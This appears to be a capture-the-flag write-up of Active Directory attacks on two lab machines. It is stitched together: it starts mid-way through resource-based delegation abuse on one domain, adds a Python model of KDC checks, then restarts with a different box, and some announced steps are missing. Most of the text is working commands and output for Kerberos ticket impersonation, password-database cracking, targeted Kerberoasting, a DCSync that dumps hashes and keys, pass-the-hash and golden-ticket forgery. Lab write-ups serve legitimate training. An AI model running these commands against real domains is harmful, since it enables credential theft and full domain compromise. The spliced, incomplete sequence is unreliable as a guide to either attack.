[+] svc_ark's servicePrincipalName has been updated
Step 02 – Add to DelegatedAdmins Group
Next, we add svc_ark to the Delegated Admins group so that it holds the delegation rights. Note that I used the C.Neri_adm account for this step.
croc@hacker$ bloodyAD --host 'DC01.vintage.htb' -u 'C.Neri_adm' -p 'Uncr4ck4bl3P4ssW0rd0312' -k -d 'vintage.htb' add groupMember 'DelegatedAdmins' 'svc_ark'
[+] svc_ark added to DelegatedAdmins
Step 03 – Change the Password
I changed the password for svc_ark to Supp0rtmeonpatreon.
Everything is in place now. svc_ark is a service account with the SPN fake/fake and a member of the Delegated Admins group. We can use it to delegate to the domain controller as any unprotected user, including administrators such as L.Bianchi_adm.
Step 04 – Delegate Access
In the following command, we authenticate as svc_ark while impersonating L.Bianchi_adm, and since wmiexec relies on SMB (the CIFS service) to move its output, we request a ticket for cifs/dc01.vintage.htb.
croc@hacker:~/HTB/vintage$ impacket-getST -impersonate 'L.Bianchi_adm' -spn 'cifs/dc01.vintage.htb' -k -dc-ip '10.10.11.45' 'vintage.htb/svc_ark:Supp0rtmeonpatreon'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating L.Bianchi_adm
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in L.Bianchi_adm@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
WMI
croc@hacker$ KRB5CCNAME=L.bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache impacket-wmiexec -k -no-pass vintage.htb/L.Bianchi_adm@DC01.vintage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
vintage\l.bianchi_adm
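To make the preconditions of Steps 01 to 04 explicit, here is an added example that models the checks a KDC applies before honouring S4U2proxy against an RBCD-enabled target. This is not code from the writeup and does not talk to a real KDC or LDAP: the domain objects are constructed to mirror the writeup (DC01$ allowing DelegatedAdmins to act on its behalf, svc_ark starting with no SPN and no group), group nesting is ignored, and Administrator being in Protected Users is an assumption made only to exercise the negative case.

```python
"""Added example (not part of the writeup): a model of the KDC's decision for
S4U2self followed by S4U2proxy when the target's
msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) names the requesting service.
All domain data is constructed; nothing here contacts a real domain."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

NOT_DELEGATED = 0x100000  # userAccountControl: "Account is sensitive and cannot be delegated"


@dataclass
class Account:
    name: str
    spns: List[str] = field(default_factory=list)
    groups: Set[str] = field(default_factory=set)
    uac: int = 0
    # Computer objects only: stands in for msDS-AllowedToActOnBehalfOfOtherIdentity,
    # the users/groups allowed to delegate to this host.
    allowed_to_act: Set[str] = field(default_factory=set)


@dataclass
class Domain:
    accounts: Dict[str, Account]
    protected_users: Set[str] = field(default_factory=set)

    def principals_of(self, name: str) -> Set[str]:
        """The account plus its direct groups (nested groups are out of scope here)."""
        acct = self.accounts[name]
        return {acct.name} | set(acct.groups)

    def account_for_spn(self, spn: str) -> Optional[Account]:
        for acct in self.accounts.values():
            if spn.lower() in (s.lower() for s in acct.spns):
                return acct
        return None


def s4u2proxy(domain: Domain, service: str, impersonate: str, target_spn: str) -> Dict:
    """Decide whether `service` is issued a ticket for `target_spn` as `impersonate`."""
    svc = domain.accounts[service]
    if not svc.spns:
        return {"ok": False, "reason": "service account has no servicePrincipalName"}
    if impersonate not in domain.accounts:
        return {"ok": False, "reason": "impersonated user does not exist"}
    user = domain.accounts[impersonate]
    if impersonate in domain.protected_users:
        return {"ok": False, "reason": "user is in Protected Users; delegation refused"}
    if user.uac & NOT_DELEGATED:
        return {"ok": False, "reason": "user is marked sensitive and cannot be delegated"}
    target = domain.account_for_spn(target_spn)
    if target is None:
        return {"ok": False, "reason": "no account holds the requested SPN"}
    if not (target.allowed_to_act & domain.principals_of(service)):
        return {"ok": False,
                "reason": "service is not listed in the target's msDS-AllowedToActOnBehalfOfOtherIdentity"}
    return {"ok": True, "ticket": {"client": impersonate, "sname": target_spn, "obtained_by": service}}


def build_demo_domain() -> Domain:
    """Constructed objects mirroring the writeup; not read from the real domain."""
    accounts = {
        "DC01$": Account("DC01$", spns=["cifs/dc01.vintage.htb", "host/dc01.vintage.htb"],
                         allowed_to_act={"DelegatedAdmins"}),
        "svc_ark": Account("svc_ark"),            # no SPN, no group yet: Steps 01-02 not done
        "L.Bianchi_adm": Account("L.Bianchi_adm"),
        "C.Neri": Account("C.Neri"),
        "Administrator": Account("Administrator"),
    }
    return Domain(accounts, protected_users={"Administrator"})  # assumption for the demo


def prepare_service(domain: Domain, service: str, spn: str, group: str) -> None:
    """Step 01 (set an SPN) and Step 02 (join the delegating group) from the writeup."""
    acct = domain.accounts[service]
    acct.spns.append(spn)
    acct.groups.add(group)


if __name__ == "__main__":
    d = build_demo_domain()
    print("before:   ", s4u2proxy(d, "svc_ark", "L.Bianchi_adm", "cifs/dc01.vintage.htb"))
    prepare_service(d, "svc_ark", "fake/fake", "DelegatedAdmins")
    print("after:    ", s4u2proxy(d, "svc_ark", "L.Bianchi_adm", "cifs/dc01.vintage.htb"))
    print("protected:", s4u2proxy(d, "svc_ark", "Administrator", "cifs/dc01.vintage.htb"))
```

The order of the checks is the order the attack fails in practice: no SPN means getST cannot even complete S4U2self, a protected or "sensitive" user gets you a non-forwardable self ticket that S4U2proxy then rejects, and a service that is not in the target's allowed-to-act list fails at the S4U2proxy step. Step 03 (the password change) is not modelled because it only gives you a credential to authenticate with; it does not affect the KDC's decision.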
As is common in real-life Windows pentests, we’re given a set of credentials to start with:
Olivia/ichliebedich
nmap/TCP
Nmap showed a bunch of open ports that are typical for a Domain Controller (DC).
croc@hacker$ rustscan -a 10.10.11.42 --ulimit 5000 -- -A -T5 -Pn -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.42:21
Open 10.10.11.42:53
Open 10.10.11.42:88
Open 10.10.11.42:135
Open 10.10.11.42:139
Open 10.10.11.42:389
Open 10.10.11.42:445
Open 10.10.11.42:464
Open 10.10.11.42:593
Open 10.10.11.42:636
Open 10.10.11.42:5985
Open 10.10.11.42:9389
Open 10.10.11.42:49664
Open 10.10.11.42:49665
Open 10.10.11.42:49666
Open 10.10.11.42:49667
Open 10.10.11.42:49669
Open 10.10.11.42:53517
Open 10.10.11.42:53528
Open 10.10.11.42:53903
Open 10.10.11.42:53908
Open 10.10.11.42:53909
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 21,53,88,135,139,389,445,464,593,636,9389,49664,49665,49666,49667,49669,53517,53528,53903,53908,53909 10.10.11.42

Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 11:34 EST
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.25s latency).
Scanned at 2025-01-21 11:34:39 EST for 91s

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-21 23:34:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53517/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53528/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53903/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53908/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53909/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows 10 1703 or Windows 11 21H2 (97%), Microsoft Windows Server 2022 (96%), Windows Server 2019 (95%), Microsoft Windows Server 2012 or 2012 R2 (94%), Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 or Server 2019 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2016 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/21%OT=21%CT=%CU=30024%PV=Y%DS=2%DC=T%G=N%TM=678FCCFA%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)
SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.274 days (since Tue Jan 21 05:02:05 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Failed to receive data)
|   Check 4 (port 52572/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-21T23:35:55
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   281.14 ms 10.10.14.1
2   301.15 ms 10.10.11.42

Nmap done: 1 IP address (1 host up) scanned in 93.79 seconds
           Raw packets sent: 85 (6.902KB) | Rcvd: 92 (6.282KB)
We can see the hostname of DC in the output so let’s add it into the hosts file:
I started by looking at our environment and evaluating the attack surface:
croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.42 -u 'ADMINISTRATOR\Olivia' -p 'ichliebedich'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json          domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html
croc@hacker$ firefox domain_users_by_group.html
This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file that comes very handy afterwards when password spraying.
I found out that olivia, who we currently own, is part of Remote Management Users.
As port 5985/tcp is open, we can get evil-winrm shell access as olivia & see what we can do from there.
Evil-WinRM
I got the WinRM access but didn’t find anything juicy here!
I enumerated the available shares using the given credentials. The credentials are valid; however, as a low-privileged user we are certainly not going to have access to the administrative shares like ADMIN$ or C$.
croc@hacker$ sudo nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB  10.10.11.42  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.42  445  DC  [+] administrator.htb\Olivia:ichliebedich
SMB  10.10.11.42  445  DC  [*] Enumerated shares
SMB  10.10.11.42  445  DC  Share     Permissions  Remark
SMB  10.10.11.42  445  DC  -----     -----------  ------
SMB  10.10.11.42  445  DC  ADMIN$                 Remote Admin
SMB  10.10.11.42  445  DC  C$                     Default share
SMB  10.10.11.42  445  DC  IPC$      READ         Remote IPC
SMB  10.10.11.42  445  DC  NETLOGON  READ         Logon server share
SMB  10.10.11.42  445  DC  SYSVOL    READ         Logon server share
FTP – 21/tcp
The credentials Olivia:ichliebedich don’t appear to be valid for the FTP service:
Anonymous access is also not permitted:
💡 Think Box
In order to find a way in, I shifted my focus to enumerating potential pathways using BloodHound graphs.
BloodHound – 389/tcp
I collected the domain data as JSON files with the Python BloodHound ingestor (bloodhound-python) and uploaded them into BloodHound.
I marked olivia as owned & found out that it has GenericAll permissions over michael. That means full control! This privilege allows the trustee to manipulate the target object however they wish.
Shell as Michael
Changing the Password of Michael
As olivia has full control over michael, she must be able to change his password. I used bloodyAD to do that:
This file is a Password Safe database (.psafe3), the format used by the popular open-source Password Safe password manager. Through enumeration, I found out that these files are protected by a master password.
In order to view the passwords stored in this database, we need its master password. Luckily, there is a John the Ripper utility called pwsafe2john that converts the database header into a crackable hash, so we can attempt to crack the master password with john.
croc@hacker$ pwsafe2john Backup.psafe3 > backup.hashes
croc@hacker$ ls
backup.hashes  Backup.psafe3
croc@hacker$ john backup.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
1g 0:00:00:02 DONE (2025-01-21 15:23) 0.4975g/s 3056p/s 3056c/s 3056C/s Liverpool..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Hurrah!! The master password has been successfully cracked!
As we have compromised a bunch of other users, we must return to the BloodHound graphs and see what we can do. I found out that emily has GenericWrite over ethan:
💡 Think Box
We have three potential attack vectors: Shadow Credentials, Forced Password Reset, and Targeted Kerberoasting. The first two options were unsuccessful so we are going with targeted kerberoasting.
Targeted Kerberoasting
As an attacker, what we do is add an SPN to the target account. Once an account has an SPN, any authenticated domain user can request a service ticket for it, and that ticket is encrypted with a key derived from the account's password, so it can be cracked offline. That is what makes the account Kerberoastable. You can read more about it here.
We will be using the following script in order to perform this attack:
So, the password for ethan is limpbizkit. Congratulations, we owned another user!
Revisiting BloodHound
The user ethan has the following privileges on the domain:
DS-Replication-Get-Changes
DS-Replication-Get-Changes-In-Filtered-Set
DS-Replication-Get-Changes-All
These privileges allow ethan to perform a DCSync attack.
DCSync Attack
In this attack, the attacker impersonates a domain controller and asks the real DC to replicate account secrets (the contents of NTDS.dit, including NT hashes and Kerberos keys) over the DRSUAPI replication protocol. Watch this video or read this for a better understanding.
I used secretsdump to perform the DCSync attack and dump the NTDS.dit secrets:
croc@hacker$ impacket-secretsdump administrator.htb/'ethan':'limpbizkit'@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
Domain Admin
Finally, we can leverage a Pass-the-Hash (PtH) attack to authenticate as the Domain Administrator on the domain controller.
croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
[sudo] password for croc:

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
I wanted to delve deeper into the box by exploring some persistence techniques. I decided to give the Golden Ticket a shot! That’s when my friend/mentor, 0xCOFFEE, came to my rescue. The following note from him really helped me achieve this.
Further, I used the impacket-ticketer to generate the ticket:
croc@hacker:~$ impacket-ticketer -aesKey 'aadb89e07c87bcaf9c540940fab4af94' -domain-sid 'S-1-5-21-1088858960-373806567-254189436' -domain 'administrator.htb' -dc-ip '10.10.11.42' -user-id '500' 'Administrator'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for administrator.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache
Here,
-aesKey
Specifies the AES key of the krbtgt account (128- or 256-bit; here the aes128 key from the DCSync dump), which signs and encrypts the forged TGT
-domain-sid
Specifies the Domain SID
-user-id
Specifies the Administrator RID
Step#3: Test Out!
With the KRB5CCNAME environment variable pointing at the ticket we just generated, I used psexec to get remote access as the administrator user, and it worked flawlessly. Note the faketime wrapper: nmap reported a clock skew of almost 7 hours against the DC, and Kerberos rejects tickets whose timestamps fall outside the allowed skew, so the ticket has to be presented with a clock that matches the DC's.
croc@hacker:~$ KRB5CCNAME=Administrator.ccache faketime "$(ntpdate -q dc.administrator.htb | cut -d ' ' -f 1,2)" impacket-psexec -k -no-pass -dc-ip 10.10.11.42 'administrator.htb/administrator@DC.administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on DC.administrator.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YwxhjLVC.exe
[*] Opening SVCManager on DC.administrator.htb.....
[*] Creating service oZXF on DC.administrator.htb.....
[*] Starting service oZXF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system